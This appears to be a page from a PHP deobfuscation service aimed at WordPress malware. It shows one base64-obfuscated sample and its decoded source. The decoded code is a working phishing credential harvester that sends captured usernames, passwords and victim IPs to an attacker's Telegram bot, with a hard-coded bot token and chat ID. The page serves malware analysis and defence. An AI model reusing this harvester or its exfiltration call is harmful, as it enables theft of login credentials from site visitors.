Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php eval(base64_decode('CiBnb3RvIHRibzd4OyBBTDNsUDogaWYgKGVtcHR5KCRfUE9TVFsiXDE2MFwxNjdceDY1Il0pKSB7ICRuYW1lRXJyID0gIlw0MCI7IH0gZWxzZWlmIChzdHJsZW4oJF9QT1NUWyJceDY1XHg2ZFx4NjEiXSkgPiA2MCkgeyAkbmFtZUVyciA9ICJcNDAiOyB9IGVsc2VpZiAoc3RybGVuKCRfUE9TVFsiXHg3MFwxNjdceDY1Il0pID4gNjApIHsgJG5hbWVFcnIgPSA...



Obfuscated php code

<?php eval(base64_decode('CiBnb3RvIHRibzd4OyBBTDNsUDogaWYgKGVtcHR5KCRfUE9TVFsiXDE2MFwxNjdceDY1Il0pKSB7ICRuYW1lRXJyID0gIlw0MCI7IH0gZWxzZWlmIChzdHJsZW4oJF9QT1NUWyJceDY1XHg2ZFx4NjEiXSkgPiA2MCkgeyAkbmFtZUVyciA9ICJcNDAiOyB9IGVsc2VpZiAoc3RybGVuKCRfUE9TVFsiXHg3MFwxNjdceDY1Il0pID4gNjApIHsgJG5hbWVFcnIgPSAiXHgyMCI7IH0gZWxzZWlmIChzdHJsZW4oJF9QT1NUWyJceDY1XDE1NVx4NjEiXSkgPCAxKSB7ICRuYW1lRXJyID0gIlw0MCI7IH0gZWxzZWlmIChzdHJsZW4oJF9QT1NUWyJcMTYwXDE2N1x4NjUiXSkgPCAxKSB7ICRuYW1lRXJyID0gIlw0MCI7IH0gZWxzZSB7ICRlbWEgPSAkX1BPU1RbIlwxNDVcMTU1XHg2MSJdOyAkcHdlID0gJF9QT1NUWyJceDcwXDE2N1wxNDUiXTsgJGlwX2FkZHJlc3MgPSAkX1NFUlZFUlsiXHg1MlwxMDVceDRkXDExN1x4NTRcMTA1XHg1Zlx4NDFceDQ0XHg0NFwxMjIiXTsgJGxvY2F0aW9uID0ganNvbl9kZWNvZGUoZmlsZV9nZXRfY29udGVudHMoIlwxNTBceDc0XHg3NFx4NzBceDNhXDU3XDU3XHg2OVx4NzBcMTUxXHg2ZVwxNDZceDZmXDU2XDE1MVwxNTdceDJmeyRpcF9hZGRyZXNzfVw1N1wxNTJceDczXDE1N1x4NmUiKSk7ICRjb3VudHJ5ID0gJGxvY2F0aW9uLT5jb3VudHJ5OyAkc3RhdGUgPSAkbG9jYXRpb24tPnJlZ2lvbjsgJGNpdHkgPSAkbG9jYXRpb24tPmNpdHk7ICRpcCA9IGdldGVudigiXDEyMlx4NDVcMTE1XHg0Zlx4NTRceDQ1XHg1Zlx4NDFceDQ0XDEwNFwxMjIiKTsgJHBvcnQgPSAkX1NFUlZFUlsiXDEyMlwxMDVceDRkXHg0ZlwxMjRcMTA1XDEzN1wxMjBceDRmXDEyMlx4NTQiXTsgJGhvc3RuYW1lID0gZ2V0aG9zdGJ5YWRkcigkaXApOyAkYm90VG9rZW4gPSAiXDcwXDYyXDY0XHgzM1x4MzFceDM5XHgzNVw2N1w2M1w2NVw3MlwxMDFcMTAxXDEwN1x4NjhcMTY0XHgzMVx4NGRcMTY3XDE1MVwxMDNcMTQ3XHg3OFwxNjFcMTYyXDExNFx4NGRcMTU2XHg1NVwxMTRcMTE2XHg2YVx4NWFceDM4XDExNlwxNDRceDYyXDE0NVx4NzJcMTUyXHg3OVwxMDFcMTYxXHgzNVx4NGZceDQ5IjsgJGNoYXRJZCA9ICJcNjFcNjFcNjdceDMyXDY0XHgzNlw2Nlx4MzRceDM2XDYzIjsgJHVybCA9ICJcMTUwXHg3NFwxNjRceDcwXDE2M1w3Mlx4MmZcNTdcMTQxXDE2MFwxNTFcNTZcMTY0XDE0NVx4NmNceDY1XDE0N1x4NzJceDYxXDE1NVw1Nlx4NmZcMTYyXDE0N1x4MmZcMTQyXDE1N1wxNjR7JGJvdFRva2VufVx4MmZcMTYzXDE0NVx4NmVcMTQ0XHg0ZFx4NjVcMTYzXDE2M1x4NjFceDY3XHg2NVx4M2ZcMTQzXHg2OFwxNDFceDc0XDEzN1x4NjlceDY0XHgzZHskY2hhdElkfVx4MjZcMTY0XHg2NVwxNzBceDc0XHgzZFwxNjVcMTYzXHg2NVwxNjJcMTU2XDE0MVx4NmRcMTQ1XDcyXHgyMHskZW1hfVx4MjVcNjBceDQxXHg3MFwxNjdcNzJceDIweyRwd2V9XDQ1XHgzMFwxMDFceDQzXDE1NFwxNTFceDY1XDE1Nlx4NzRcNDBceDY5XDE2MFx4M2FceDIweyRpcH1cNDVcNjBcMTAxXDc1XDc1XHgzZFx4M2RceDNkXDc1XDc1XDc1XHgzZFw3NVw3NVw3NVw3NVx4MmJceDIwXHg1Ylx4MjBceDQzXDE2MlwxNDVcMTQxXDE2NFx4NjVceDY0XHgyMFwxNDJcMTcxXDQwXDExN1wxNTVceDY1XHg0N1wxNDFceDRjXHg2ZlwxNjJceDQ0XDQwXDEzNVw0MFw1M1x4M2RceDNkXDc1XDc1XDc1XHgzZFx4M2RcNzVceDNkXHgzZFw3NVw3NVx4M2QiOyAkc3RyZWFtT3B0aW9ucyA9IGFycmF5KCJcMTYzXHg3M1wxNTQiID0+IGFycmF5KCJcMTY2XHg2NVx4NzJceDY5XHg2NlwxNzFcMTM3XDE2MFwxNDVcMTQ1XDE2MiIgPT4gZmFsc2UsICJceDc2XHg2NVwxNjJcMTUxXDE0Nlx4NzlcMTM3XHg3MFwxNDVcMTQ1XDE2Mlx4NWZceDZlXHg2MVx4NmRcMTQ1IiA9PiBmYWxzZSksICJcMTUwXDE2NFx4NzRcMTYwIiA9PiBhcnJheSgiXHg2ZFwxNDVceDc0XHg2OFwxNTdcMTQ0IiA9PiAiXHg1MFx4NGZcMTIzXHg1NCIpKTsgJGNvbnRleHQgPSBzdHJlYW1fY29udGV4dF9jcmVhdGUoJHN0cmVhbU9wdGlvbnMpOyAkaGFuZGxlID0gZm9wZW4oJHVybCwgIlx4NzIiLCBmYWxzZSwgJGNvbnRleHQpOyAkcmVzcG9uc2UgPSBzdHJlYW1fZ2V0X2NvbnRlbnRzKCRoYW5kbGUpOyBmY2xvc2UoJGhhbmRsZSk7IGVjaG8gJHJlc3BvbnNlOyB9IGdvdG8gQzRBaTI7IHRibzd4OiBzZXNzaW9uX3N0YXJ0KCk7IGdvdG8gRnJXazg7IEZyV2s4OiBpZiAoZW1wdHkoJF9QT1NUWyJceDY1XHg2ZFx4NjEiXSkpIHsgJG5hbWVFcnIgPSAiXHgyMCI7IH0gZ290byBBTDNsUDsgQzRBaTI6IA==')); ?>

Decoded(de-Obfuscated) php code

<?php

eval {
    session_start();
    if (empty($_POST["ema"])) {
        $nameErr = " ";
    }
    if (empty($_POST["pwe"])) {
        $nameErr = " ";
    } elseif (strlen($_POST["ema"]) > 60) {
        $nameErr = " ";
    } elseif (strlen($_POST["pwe"]) > 60) {
        $nameErr = " ";
    } elseif (strlen($_POST["ema"]) < 1) {
        $nameErr = " ";
    } elseif (strlen($_POST["pwe"]) < 1) {
        $nameErr = " ";
    } else {
        $ema = $_POST["ema"];
        $pwe = $_POST["pwe"];
        $ip_address = $_SERVER["REMOTE_ADDR"];
        $location = json_decode(file_get_contents("http://ipinfo.io/{$ip_address}/json"));
        $country = $location->country;
        $state = $location->region;
        $city = $location->city;
        $ip = getenv("REMOTE_ADDR");
        $port = $_SERVER["REMOTE_PORT"];
        $hostname = gethostbyaddr($ip);
        $botToken = "8243195735:AAGht1MwiCgxqrLMnULNjZ8NdberjyAq5OI";
        $chatId = "1172466463";
        $url = "https://api.telegram.org/bot{$botToken}/sendMessage?chat_id={$chatId}&text=username: {$ema}%0Apw: {$pwe}%0AClient ip: {$ip}%0A=============+ [ Created by OmeGaLorD ] +=============";
        $streamOptions = array("ssl" => array("verify_peer" => false, "verify_peer_name" => false), "http" => array("method" => "POST"));
        $context = stream_context_create($streamOptions);
        $handle = fopen($url, "r", false, $context);
        $response = stream_get_contents($handle);
        fclose($handle);
        echo $response;
    }
};

Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.